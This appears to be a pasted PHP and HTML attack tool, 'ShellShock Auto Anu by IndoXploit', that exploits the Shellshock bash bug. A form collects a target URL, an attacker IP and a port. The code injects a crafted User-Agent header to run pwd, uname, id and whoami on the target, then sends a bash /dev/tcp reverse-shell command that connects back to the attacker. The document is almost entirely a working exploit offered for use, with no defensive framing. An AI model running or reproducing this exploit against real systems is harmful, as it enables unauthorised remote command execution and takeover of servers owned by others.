SHOW:
|
|
- or go back to the newest paste.
| 1 | <html> | |
| 2 | <h1>ShellShock Auto Anu by IndoXploit</h1> | |
| 3 | <form method="post"> | |
| 4 | Target: <br><input type="text" name="url" style="width: 400px; margin: 10px auto; " height="10" placeholder="http://www.target.com/"><br> | |
| 5 | IP VPSmu: <br><input type="text" name="ip" style="width: 400px; margin: 10px auto; " height="10" placeholder="127.0.0.1"><br> | |
| 6 | PORT Listening: <br><input type="text" name="port" style="width: 400px; margin: 10px auto; " height="10" placeholder="1337"><br> | |
| 7 | <input type="submit" name="go" style="width: 400px; margin: 10px auto; " value="test"> | |
| 8 | </form> | |
| 9 | </html> | |
| 10 | <?php | |
| 11 | // indoxploit - evoo | |
| 12 | function pwn($site,$cmd) {
| |
| 13 | $useragent = "() { :; }; echo; /bin/$cmd";
| |
| 14 | $ch = curl_init($site); | |
| 15 | curl_setopt($ch, CURLOPT_USERAGENT, $useragent); | |
| 16 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
| 17 | $postResult = curl_exec($ch); | |
| 18 | return $postResult; | |
| 19 | } | |
| 20 | $url = $_POST['url']; | |
| 21 | $go = $_POST['go']; | |
| 22 | $ip = $_POST['ip']; | |
| 23 | $port = $_POST['port']; | |
| 24 | if(isset($go)) {
| |
| 25 | echo "<pre>"; | |
| 26 | echo "=> $url<br>"; | |
| 27 | echo "pwd: ". pwn($url, "pwd") ."<br>"; | |
| 28 | echo "uname -a: ". pwn($url, "uname -a") . "<br>"; | |
| 29 | echo "id: ". pwn($url, "bash -c 'id'") . "<br>"; | |
| 30 | echo "whoami: ". pwn($url, "bash -c 'whoami'") . "<br>"; | |
| 31 | echo pwn($url, 'bash -i >& /dev/tcp/'.$ip.'/'.$port.' 0>&1') . "<br>"; | |
| 32 | echo "[ auto anu selesaiii bossqq ]<br><br>"; | |
| 33 | echo "</pre>"; | |
| 34 | } | |
| 35 | ?> |
